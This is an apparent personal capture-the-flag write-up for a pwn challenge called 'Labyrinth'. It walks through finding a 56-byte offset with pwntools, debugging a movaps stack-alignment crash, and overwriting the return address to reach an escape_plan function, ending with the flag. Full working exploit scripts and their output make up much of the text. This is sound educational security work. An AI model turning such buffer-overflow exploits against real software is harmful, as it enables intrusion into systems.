# Labyrinth

This one was a bit of a challenge for me as I needed to familiarize myself with new tools once I figured out what needed to be done.

## Disassembly

First I disassembled the program using Ghidra. Hoping for a quick win I noticed a check for door 69.

![Initial disassembly](./1-disassembly.png)

After playing around with the program for a bit I had a look at the other functions within the program and noticed a function called `escape_plan`.

![Disassembling escape_plan function](./2-disassembly-escape-plan.png)

There is no way to reach this code normally so I'd need to leverage a buffer overflow after choosing door 69 and overflow the fgets function.

## Figuring out Pwntools

It's been a while since I wrote a buffer overflow but as I've been enjoying the CTFs I went through the effort of installing pwntools and followed a couple of YouTube videos and online guides to get a feel for how I would write the code.

I manually ran the program several times and found the offset to be 56. Then by following some guides I learned (and confirmed) how I can more easily determine this using pwntools.

### Finding Offsets Using Pwntools

```python
import pwn

elf = pwn.ELF("./labyrinth")
#p = pwn.remote("0.0.0.0", "1337")
p = elf.process()

print(p.recv().decode("utf-8"))

p.sendline(b"69")

print(p.recvuntil(b">>").decode("utf-8"))

# Send payload
p.sendline(pwn.cyclic(100))
p.wait()

core = p.corefile
stack = core.rsp
pwn.info("rsp = %#x", stack)
pattern = core.read(stack, 4)
rip_offset = pwn.cyclic_find(pattern)

pwn.info("rip offset is %d", rip_offset)
```

### Offset Output

This yielded the following output:
```
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▒-▸        ▒           ▒          ▒
▒-▸        ▒     O     ▒          ▒
▒-▸        ▒    '|'    ▒          ▒
▒-▸        ▒    / \    ▒          ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▲△▲△▲△▲△▲△▒

Select door: 

Door: 001 Door: 002 Door: 003 Door: 004 Door: 005 Door: 006 Door: 007 Door: 008 Door: 009 Door: 010 
Door: 011 Door: 012 Door: 013 Door: 014 Door: 015 Door: 016 Door: 017 Door: 018 Door: 019 Door: 020 
Door: 021 Door: 022 Door: 023 Door: 024 Door: 025 Door: 026 Door: 027 Door: 028 Door: 029 Door: 030 
Door: 031 Door: 032 Door: 033 Door: 034 Door: 035 Door: 036 Door: 037 Door: 038 Door: 039 Door: 040 
Door: 041 Door: 042 Door: 043 Door: 044 Door: 045 Door: 046 Door: 047 Door: 048 Door: 049 Door: 050 
Door: 051 Door: 052 Door: 053 Door: 054 Door: 055 Door: 056 Door: 057 Door: 058 Door: 059 Door: 060 
Door: 061 Door: 062 Door: 063 Door: 064 Door: 065 Door: 066 Door: 067 Door: 068 Door: 069 Door: 070 
Door: 071 Door: 072 Door: 073 Door: 074 Door: 075 Door: 076 Door: 077 Door: 078 Door: 079 Door: 080 
Door: 081 Door: 082 Door: 083 Door: 084 Door: 085 Door: 086 Door: 087 Door: 088 Door: 089 Door: 090 
Door: 091 Door: 092 Door: 093 Door: 094 Door: 095 Door: 096 Door: 097 Door: 098 Door: 099 Door: 100 

>> 

You are heading to open the door but you suddenly see something on the wall:

"Fly like a bird and be free!"

Would you like to change the door you chose?

>>
[*] Process '/home/kali/cyberapocalypse2023/pwn/labyrinth/challenge/labyrinth' stopped with exit code -11 (SIGSEGV) (pid 165036)
[+] Parsing corefile...: Done
[*] '/home/kali/cyberapocalypse2023/pwn/labyrinth/challenge/core.165036'
    Arch:      amd64-64-little
    RIP:       0x401602
    RSP:       0x7ffc69ec59b8
    Exe:       '/home/kali/cyberapocalypse2023/pwn/labyrinth/challenge/labyrinth' (0x400000)
    Fault:     0x616161706161616f
[*] rsp = 0x7ffc69ec59b8
[*] rip offset is 56
[+] Receiving all data: Done (36B)
 
[-] YOU FAILED TO ESCAPE!
```

### Jumping the Escape Plan

I tried the following python code to jump to the function:
```python
import pwn

elf = pwn.ELF("./labyrinth")
#p = pwn.remote("68.183.37.122", "30077")
p = elf.process()

print(p.recv().decode("utf-8"))

p.sendline(b"69")

print(p.recvuntil(b">>").decode("utf-8"))

"""
# Send payload
p.sendline(pwn.cyclic(100))
p.wait()

core = p.corefile
stack = core.rsp
pwn.info("rsp = %#x", stack)
pattern = core.read(stack, 4)
rip_offset = pwn.cyclic_find(pattern)

pwn.info("rip offset is %d", rip_offset)
"""

# rip offset is 56
new_eip = pwn.p64(elf.symbols["escape_plan"])

payload = b"".join(
    [
        b"A" * 56,
        new_eip,
    ]
)

p.sendline(payload)
```

However, the output would result in a crash but I could see some ASCII art drawn to console. Something wasn't right.

```
[+] Receiving all data: Done (693B)
[*] Stopped process '/home/kali/cyberapocalypse2023/pwn/labyrinth/challenge/labyrinth' (pid 166811)
 
You are heading to open the door but you suddenly see something on the wall:

"Fly like a bird and be free!"

Would you like to change the door you chose?

>> 
[-] YOU FAILED TO ESCAPE!                                                                                                                
                                                                                                                                         
                                                                                                                                         
                \O/                                                                                                                      
                 |                                                                                                                       
                / \                                                                                                                      
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒   ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▲△▲△▲△▲△▲△▒ 
```

### Preparing for a Second Attempt

What was going on? I used `readelf -h labyrinth` and `checksec --file=labyrinth` to learn more about how the file was compiled.

![readelf output](./3-readelf.png)

![checksec output](./4-checksec-output.png)

I then figured out how to attach the debugger so I can read more into the crash.

![GDB Debugging via pwntools](./5-pwntools-attach-debugger.png)

I'm in the function. But I'm crashing at this `movaps` instruction that I've never dealt with before. Some googling led me to [this](https://stackoverflow.com/questions/67243284/why-movaps-causes-segmentation-fault) StackOverflow post.

![Figuring out movaps](./6-movaps-research.png)

And this answer:

![Finding an answer to the movaps issue](./7-movaps-solution.png)

Reviewing the assembly for the escape_plan function I see the starting address is 0x401255.

![Confirming the escape_plan function address](./8-getting-escape-plan-address.png)

Well this isn't going to work. But maybe I can increment it by 1? I need to hardcode the address when running against the remote docker connection anyway.

## Solution

```python
import pwn

elf = pwn.ELF("./labyrinth")
#p = pwn.remote("0.0.0.0", "1337")
p = elf.process()
g = pwn.gdb.attach(p)

print(p.recv().decode("utf-8"))

p.sendline(b"69")

print(p.recvuntil(b">>").decode("utf-8"))

"""
# Send payload
p.sendline(pwn.cyclic(100))
p.wait()

core = p.corefile
stack = core.rsp
pwn.info("rsp = %#x", stack)
pattern = core.read(stack, 4)
rip_offset = pwn.cyclic_find(pattern)

pwn.info("rip offset is %d", rip_offset)
"""

# rip offset is 56
#new_eip = pwn.p64(elf.symbols["escape_plan"])
new_eip = pwn.p64(0x401256)

payload = b"".join(
    [
        b"A" * 56,
        new_eip,
    ]
)

p.sendline(payload)
```

Thankfully that did it, and I found the flag.

![Finally escaping and capturing the flag](./9-finding-the-flag.png)

```
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒     O     ▒          ▒                                                                                                      
▒-▸        ▒    '|'    ▒          ▒                                                                                                      
▒-▸        ▒    / \    ▒          ▒                                                                                                      
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▲△▲△▲△▲△▲△▒                                                                                                      
                                                                                                                                         
Select door:                                                                                                                             
                                                                                                                                         
Door: 001 Door: 002 Door: 003 Door: 004 Door: 005 Door: 006 Door: 007 Door: 008 Door: 009 Door: 010                                      
Door: 011 Door: 012 Door: 013 Door: 014 Door: 015 Door: 016 Door: 017 Door: 018 Door: 019 Door: 020                                      
Door: 021 Door: 022 Door: 023 Door: 024 Door: 025 Door: 026 Door: 027 Door: 028 Door: 029 Door: 030                                      
Door: 031 Door: 032 Door: 033 Door: 034                                                                                                  
Door: 035 Door: 036 Door: 037 Door: 038 Door: 039 Door: 040                                                                              
Door: 041 Door: 042 Door: 043 Door: 044 Door: 045 Door: 046 Door: 047 Door: 048 Door: 049 Door: 050                                      
Door: 051 Door: 052 Door: 053 Door: 054 Door: 055 Door: 056 Door: 057 Door: 058 Door: 059 Door: 060                                      
Door: 061 Door: 062 Door: 063 Door: 064 Door: 065 Door: 066 Door: 067 Door: 068 Door: 069 Door: 070                                      
Door: 071 Door: 072 Door: 073 Door: 074 Door: 075 Door: 076 Door: 077 Door: 078 Door: 079 Door: 080                                      
Door: 081 Door: 082 Door: 083 Door: 084 Door: 085 Door: 086 Door: 087 Door: 088 Door: 089 Door: 090                                      
Door: 091 Door: 092 Door: 093 Door: 094 Door: 095 Door: 096 Door: 097 Door: 098 Door: 099 Door: 100                                      
                                                                                                                                         
>>                                                                                                                                       
[+] Receiving all data: Done (816B)
[*] Closed connection to 159.65.94.38 port 32632
 
You are heading to open the door but you suddenly see something on the wall:

"Fly like a bird and be free!"

Would you like to change the door you chose?

>> 
[-] YOU FAILED TO ESCAPE!                                                                                                                
                                                                                                                                         
                                                                                                                                         
                \O/                                                                                                                      
                 |                                                                                                                       
                / \                                                                                                                      
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒   ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒-▸        ▒           ▒          ▒                                                                                                      
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▲△▲△▲△▲△▲△▒                                                                                                      
                                                                                                                                         
Congratulations on escaping! Here is a sacred spell to help you continue your journey: 
HTB{3sc4p3_fr0m_4b0v3}
```

## Flag

`HTB{3sc4p3_fr0m_4b0v3}`